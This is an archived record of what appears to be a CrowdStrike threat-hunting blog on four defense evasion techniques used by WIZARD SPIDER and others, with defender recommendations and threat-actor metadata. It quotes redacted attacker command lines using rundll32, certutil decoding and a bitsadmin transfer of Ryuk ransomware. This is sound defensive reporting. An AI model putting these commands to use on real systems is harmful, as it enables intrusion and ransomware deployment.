{ "id": "764b0f07-d150-49a5-a265-9be716c84cee", "created_at": "2026-04-06T00:18:01.006548Z", "updated_at": "2026-04-10T03:36:11.272403Z", "deleted_at": null, "sha1_hash": "3e517c11e1a8b709d48700f4c8d4c75dd58ceeb0", "title": "4 Popular Defensive Evasion Techniques in 2021 | CrowdStrike", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 294097, "plain_text": "4 Popular Defensive Evasion Techniques in 2021 | CrowdStrike\r\nBy falcon.overwatch.team\r\nArchived: 2026-04-05 22:51:57 UTC\r\nThere is an endless struggle between hunters and adversaries. As soon as hunters shine a light on the latest\r\nmalicious activities, adversaries pivot and find a new way to hide in the shadows. Indeed, of all the MITRE\r\nATT\u0026CK® tactic groups, defense evasion stands out as having by far the most extensive array of techniques and\r\nsubtechniques. Whether these techniques are used to enable a “low and slow” strategic intrusion or to evade\r\ntechnology-based detections in a “smash and grab” attack, defense evasion is a critical step in adversaries’ kill-chain. This blog explores four popular defense evasion techniques that the Falcon OverWatch™ team has seen in\r\nuse by adversaries in 2021. It shares real-world examples of how OverWatch has observed these techniques and\r\nsub-techniques used by adversaries to subvert security controls and operate in a covert manner, and it provides\r\nguidance on how defenders can begin to look for the activity themselves.\r\n1. Signed Binary Proxy Execution: Rundll32\r\nTechnique Overview\r\nSigned binary proxy execution leverages legitimate built-in utilities to execute malicious commands. Adversaries\r\ntake advantage of trusted and commonly used utilities that are signed with digital certificates to proxy the\r\nexecution of malicious binaries. This example looks at the use of Rundll32.\r\nOverWatch Perspective\r\nThe anomalous use of rundll32.exe , coupled with irregular process activity and a burst of suspicious command\r\nline invocations, alerted OverWatch to potentially malicious activity. Deeper analysis confirmed the malicious\r\nactivity and linked it to the prolific eCrime adversary WIZARD SPIDER. The adversary gained initial remote\r\naccess after a phishing document was opened, resulting in arbitrary code execution under a productivity\r\napplication, and providing the adversary with interactive access to a valid user account. Additionally, the code\r\nexecution led to rundll32.exe being used to write a Cobalt Strike DLL to disk, allowing WIZARD SPIDER\r\nfurther capabilities to compromise the host. Once WIZARD SPIDER established interactive access, they wrote a\r\nfurther malicious DLL file to disk. They then used the below command to proxy the execution of the DLL through\r\na second rundll32.exe process. C:\\Windows\\System32\\rundll32.exe test.dll, test The malicious DLL\r\nspawned a child process of rundll32.exe that was used to interact with explorer.exe . WIZARD SPIDER\r\nperformed host reconnaissance activity under the trusted explorer.exe process. OverWatch notified the victim\r\norganization in the early stages of this intrusion and armed them with the information needed to disrupt the\r\nadversary before they could move deeper into the network or execute any ransomware payloads.\r\nhttps://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/\r\nPage 1 of 7\n\nFigure 1. Execution of a malicious DLL via rundll32.exe, leading to injected threads into Explorer.exe and covert\r\nreconnaissance operations\r\nA consistent theme of this intrusion activity is WIZARD SPIDER’s efforts to conceal their operations by operating\r\nunder legitimate signed processes. While the victim organization was containing the host in response to the\r\nOverWatch notification, threat hunters observed the adversary continuing to conduct host and network\r\nenumeration activities consistent with early stage ransomware preparation operations. Ultimately, the rapid\r\nidentification of the activity by OverWatch threat hunters led to the timely delivery of an actionable notification to\r\nthe victim organization. This enabled them to quickly act to both contain and subsequently eradicate WIZARD\r\nSPIDER from the network before they could achieve their mission objectives.\r\nDefensive Recommendations\r\nMaintain a baseline of “known good” command line arguments, especially those associated with\r\nsigned binaries such as installutil.exe , msbuild.exe , mshta.exe and rundll32.exe .\r\nRemain alert to instances of productivity applications interacting suspiciously with system processes,\r\nas adversaries may inject a phishing payload into rundll32.exe . Inspecting file changes made by these\r\nutilities is also a great way to check for possible malicious use of signed binaries.\r\nFamiliarize yourself with the command line operators that adversaries can invoke in a malicious\r\nrundll32.exe function call. Additional operators can enable adversaries to modify or acquire files, or\r\neven execute arbitrary code such as Javascript.\r\nMonitor file paths associated with DLLs being executed by rundll32.exe . For example, observing a\r\nDLL loaded from a suspicious path such as %Temp% would be highly unusual for most environments.\r\n2. Hijack Execution Flow: DLL Search Order Hijacking\r\nTechnique Overview\r\nhttps://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/\r\nPage 2 of 7\n\nDLL Search Order Hijacking takes advantage of how Windows handles DLLs and the search order it uses to\r\nlocate DLLs for loading into a program. Adversaries can hijack this search order mechanic to load a malicious\r\nDLL into a program in an attempt to bypass security controls.\r\nOverWatch Perspective\r\nOverWatch exposed the use of this technique by a likely China-nexus adversary. The adversary was discovered\r\noperating under a valid user account, having gained access by setting scheduled tasks via an RDP session. The\r\nadversary used Certutil commands to decode and execute binaries via a batch script. They also attempted to install\r\na PlugX implant using DLL search order hijacking in conjunction with a legitimate third-party antivirus\r\nexecutable and a weaponized DLL. The attacker had modified this DLL to perform reconnaissance and\r\nconnectivity testing under the legitimate Windows Service Host process, svchost.exe . certutil -f -decode\r\nC:\\Programdata\\1.txt C:\\ProgramData\\\u003cREDACTED\u003e.exe certutil -f -decode C:\\Programdata\\2.txt\r\nC:\\ProgramData\\\u003cREDACTED\u003e.dll OverWatch quickly uncovered this malicious activity by surfacing unusual\r\nexecution of certutil commands, along with attempts to set remote scheduled tasks and a range of system\r\ndiscovery activity.\r\nFigure 2. PlugX installation following DLL search order hijacking using a legitimate antivirus software binary and\r\na malicious DLL file\r\nDefensive Recommendations\r\nLook for any unusual process spawn events — context is key here, and it is important for defenders\r\nto not view events in isolation. Know which system events spawn following a known-good execution and\r\nsearch for any changes in this behavior. Note that adversaries may download programs to perform this\r\nattack if there is not a suitable option on the host.\r\nAnalyze exported functions to understand the DLL’s capabilities and which subsequent system calls\r\nyou can expect from a given application. It is also important to look for any DLLs that have the same file\r\nname but abnormal file paths.\r\nhttps://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/\r\nPage 3 of 7\n\nInvestigate changes to manifest files, such as anomalous modification or creation times. Legitimate\r\nmanifest files sometimes also include the hash of the legitimate DLL file, and therefore adversaries may\r\ntarget these files to alter or remove this protection in preparation for DLL search order hijacking.\r\nBe aware that adversaries will often use legitimate software such as Process Monitor to identify applications\r\nvulnerable to DLL search order hijacking by looking for DLLs being loaded without a full path being specified. It\r\nis therefore important to search for any DLL changes or suspicious process activity that occurs in parallel with a\r\nburst of reconnaissance or unknown network connections.\r\n3. Process Injection: DLL Injection\r\nTechnique Overview\r\nThe DLL injection technique enables adversaries to inject code from a malicious DLL and execute it under the\r\ncontext of a target process. With this technique, adversaries are able to harness the process’s resources to perform\r\nmalicious operations, all while being associated with a legitimate process. Process injection is a valuable\r\ntechnique for an attacker as it allows for the execution of code within the memory space of legitimate processes.\r\nThis makes detection challenging as malicious use of native Windows API behavior is generally quite difficult to\r\ndistinguish from legitimate API functions.\r\nOverWatch Perspective\r\nDLL injection was deployed in the early stages of an attempted ransomware operation, which aligns with activity\r\npreviously attributed to WIZARD SPIDER. This intrusion took place in the wake of a successful phishing attack.\r\nVarious malicious files were written to disk, including multiple executables and a DLL file, each masquerading as\r\nlegitimate browser files. Analysis showed that the DLL file was intended to provide a means of performing\r\nprocess injection, and the executables allowed for subsequent reconnaissance and command and control in\r\npreparation for ransomware deployment. As seen below, once the malicious DLL file was executed, the entry\r\npoint “Mars” was located, and the associated code was launched, allowing injection and reconnaissance to be\r\nperformed. From there, OverWatch identified communication with multiple processes, including terminal services\r\nthat the adversary likely intended to use for further hands-on command execution. C:\\WINDOWS\\system32\\cmd.exe\r\n/C rundll32 \u003cREDACTED\u003e.dll, Mars OverWatch recognized suspicious remote threads being created alongside\r\nirregular process tree activity and suspicious reconnaissance activity. Any one of these on their own may have\r\nbeen dismissed, but analyzed together they paint a clear picture of a hands-on intrusion. OverWatch was able to\r\nleverage this aggregate view to rapidly identify and escalate the intrusion to the victim organization, which in turn\r\nenabled the victim to contain the adversary before they could complete their mission.\r\nhttps://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/\r\nPage 4 of 7\n\nFigure 3. DLL injection leading to injected threads into various processes for reconnaissance and C2 operations\r\nDefensive Recommendations\r\nInvestigate inconsistencies with typical execution, such as processes performing unknown network\r\nconnections or reading/writing files to disk. It can also help to look for instances where processes load\r\nunknown or abnormal DLLs during runtime. Furthermore, concomitant network connections or\r\ncommunication between additional internal endpoints may be an indication of post-compromise command\r\nand control traffic.\r\nReview API calls associated with suspicious processes. VirtualAllocEx and WriteProcessMemory are\r\nexamples of APIs that are often leveraged by adversaries to tamper with process memory and perform DLL\r\nInjection. Preventing this activity is difficult because limiting access to APIs may prevent legitimate\r\nsoftware from functioning. It is therefore important to leverage human analysts to dig into this activity.\r\n4. BITS Jobs\r\nTechnique Overview\r\nWindows Background Intelligent Transfer Service (BITS) is a file transfer mechanism used by some applications\r\nto transfer files using only idle bandwidth. BITS jobs are used to schedule these file transfers and can be used by\r\nadversaries to download and execute files. BITS jobs are appealing to adversaries trying to covertly upload or\r\ndownload files because they are ubiquitous within many environments and commonly used in a legitimate\r\nadministrative context.\r\nOverWatch Perspective\r\nhttps://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/\r\nPage 5 of 7\n\nThe next example also examines WIZARD SPIDER activity, which reflects just how prolific this group has been\r\nin the past year, and the variety of techniques they have used. In this intrusion, OverWatch observed WIZARD\r\nSPIDER using BITS jobs during an attempted Ryuk ransomware deployment. The following command line\r\nhighlights one such attempt to use BITS jobs to push the Ryuk ransomware binary. WIZARD SPIDER scheduled\r\nthe operation using BITSadmin, the tool used to create BITS transfer jobs. In this case, it is likely that WIZARD\r\nSPIDER intended to infect the domain controllers to improve their chances of extracting payment.\r\ncmd.exe /c bitsadmin /transfer \u003cREDACTED\u003e \\\\10.\u003cREDACTED\u003e\\share$\\\u003cREDACTED\u003e.exe C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roa\r\nDuring this intrusion, WIZARD SPIDER appeared to focus on a distinct set of objectives and set scheduled tasks\r\nto attempt this BITSadmin transfer of Ryuk routinely using Windows Management Instrumentation (WMI). WMI\r\nis often seen during hunting operations as a way for adversaries to perform local and remote command execution.\r\nThis is also another example of a native tool used in normal operations by administrators, a further indication of\r\ntheir comfort in using native tools to carry out their intrusion. OverWatch identified this activity due to observing\r\nglobally rare BITS transfer commands alongside anomalous administrative tool usage, one of which was WMIC.\r\nWhen it comes to isolating potentially malicious tool usage under valid accounts, human hunters are best placed to\r\ninvestigate the surrounding context that helps distinguish between what could be legitimate or illegitimate.\r\nDefensive Recommendations\r\nRoutinely investigate BITS activity and instances of command line transfers. System logs and the\r\nBITS job database are rich hunting grounds — it is crucial to validate which tasks are scheduled and if\r\nthere are any unknown jobs. BITS jobs can also be invoked using PowerShell, so logs such as the\r\nScriptBlockText log can be a useful place for identifying BITS requests.\r\nBe mindful that BITS jobs will almost never be blocked as they are required for Windows updates.\r\nMonitoring network connections associated with BITS jobs to gain insights into potential abuse of BITS\r\njobs and bitsadmin.exe.\r\nHunt regularly, as BITS jobs can be scheduled for up to 90 days, and adversaries have been known\r\nto prepare transfer tasks to run at a later date. It is also important to ensure appropriate logging is\r\navailable to enable detailed analysis of BITS jobs.\r\nAnalyze the file paths involved in BITS activity and check for signs of the adversary manipulating\r\nthe query strings to evade detection or potentially using encoding to obfuscate their requests.\r\nLook for instances of unapproved software usage and analyze any existing programs that could be\r\nleveraged to transfer code internally. Adversaries actively look for built-in utilities that can be used to\r\nconfigure malicious commands. Some frequently used utilities in addition to BITS include scheduled tasks\r\non Windows systems and cron and nohup on Linux systems. Third-party tooling can also be used to\r\nconfigure tasks and transfer jobs.\r\nConclusion\r\nSo far this year, OverWatch has identified more than 60 defense evasion techniques and subtechniques being used\r\nby adversaries in the wild during interactive intrusions. These techniques are explicitly designed to evade\r\ntechnology-based defenses, and as seen in the examples explored here, they leverage native utilities in an attempt\r\nhttps://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/\r\nPage 6 of 7\n\nto blend in with expected activity. The OverWatch SEARCH methodology draws together human expertise,\r\nsystematic processes and world-class technology to continuously refine hunting activity and stay a step ahead of\r\nthe threat. Incombination, these elements enable OverWatch to quickly effectively identify covert activity and\r\nnotify victims in near real time. A crucial step in the SEARCH methodology is “Hone” — the stage at which new\r\nhunting findings are operationalized as hunting leads or fed back into the platform as detections to drive\r\ncontinuous improvement. Each new find paints a clearer picture of adversary activity and enables threat hunters to\r\nredouble their efforts hunting for evasive techniques that cannot be found by technology alone. OverWatch\r\nrecommends that defenders employ a systemic approach — such as the SEARCH methodology — to derive\r\nmaximum value from hunting efforts. With such a wide variety of defense evasion techniques at adversaries’\r\ndisposal, it is critical for defenders to remain informed of the techniques that adversaries are currently using to try\r\nto hide in victim environments.\r\nAdditional Resources\r\nRead about the latest trends in threat hunting and more in the 2021 Threat Hunting Report.\r\nLearn more about Falcon OverWatch proactive managed threat hunting.\r\nWatch this video to see how Falcon OverWatch proactively hunts for threats in your environment.\r\nRead more about how hunting part-time is simply not enough in this CrowdStrike blog.\r\nLearn more about the CrowdStrike Falcon® platform by visiting the product webpage.\r\nTest CrowdStrike next-gen AV for yourself. Start your free trial of Falcon Prevent™ today.\r\nSource: https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/\r\nhttps://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/" ], "report_names": [ "four-popular-defensive-evasion-techniques-in-2021" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "f6f91e1c-9202-4497-bf22-9cd5ef477600", "created_at": "2023-01-06T13:46:38.86765Z", "updated_at": "2026-04-10T02:00:03.12735Z", "deleted_at": null, "main_name": "WIZARD SPIDER", "aliases": [ "TEMP.MixMaster", "GOLD BLACKBURN", "DEV-0193", "UNC2053", "Pistachio Tempest", "DEV-0237", "Storm-0230", "FIN12", "Periwinkle Tempest", "Storm-0193", "Trickbot LLC" ], "source_name": "MISPGALAXY:WIZARD SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e", "created_at": "2024-06-04T02:03:07.799286Z", "updated_at": "2026-04-10T02:00:03.606456Z", "deleted_at": null, "main_name": "GOLD BLACKBURN", "aliases": [ "ITG23 ", "Periwinkle Tempest ", "Wizard Spider " ], "source_name": "Secureworks:GOLD BLACKBURN", "tools": [ "BazarLoader", "Buer Loader", "Bumblebee", "Dyre", "Team9", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3", "created_at": "2022-10-25T16:07:24.422115Z", "updated_at": "2026-04-10T02:00:04.983298Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "DEV-0193", "G0102", "Gold Blackburn", "Gold Ulrick", "Grim Spider", "ITG23", "Operation BazaFlix", "Periwinkle Tempest", "Storm-0230", "TEMP.MixMaster", "Wizard Spider" ], "source_name": "ETDA:Wizard Spider", "tools": [ "AdFind", "Agentemis", "Anchor_DNS", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "Conti", "Diavol", "Dyranges", "Dyre", "Dyreza", "Dyzap", "Gophe", "Invoke-SMBAutoBrute", "KEGTAP", "LaZagne", "LightBot", "PowerSploit", "PowerTrick", "PsExec", "Ryuk", "SessionGopher", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "TrickMo", "Upatre", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434681, "ts_updated_at": 1775792171, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3e517c11e1a8b709d48700f4c8d4c75dd58ceeb0.pdf", "text": "https://archive.orkl.eu/3e517c11e1a8b709d48700f4c8d4c75dd58ceeb0.txt", "img": "https://archive.orkl.eu/3e517c11e1a8b709d48700f4c8d4c75dd58ceeb0.jpg" } }